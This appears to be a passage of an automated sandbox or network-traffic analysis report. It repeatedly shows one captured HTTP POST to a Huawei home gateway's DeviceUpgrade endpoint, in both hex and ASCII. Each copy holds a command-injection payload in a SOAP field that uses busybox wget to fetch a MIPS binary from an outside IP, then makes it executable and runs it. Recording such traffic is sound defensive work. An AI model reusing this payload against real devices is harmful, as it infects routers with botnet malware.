3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
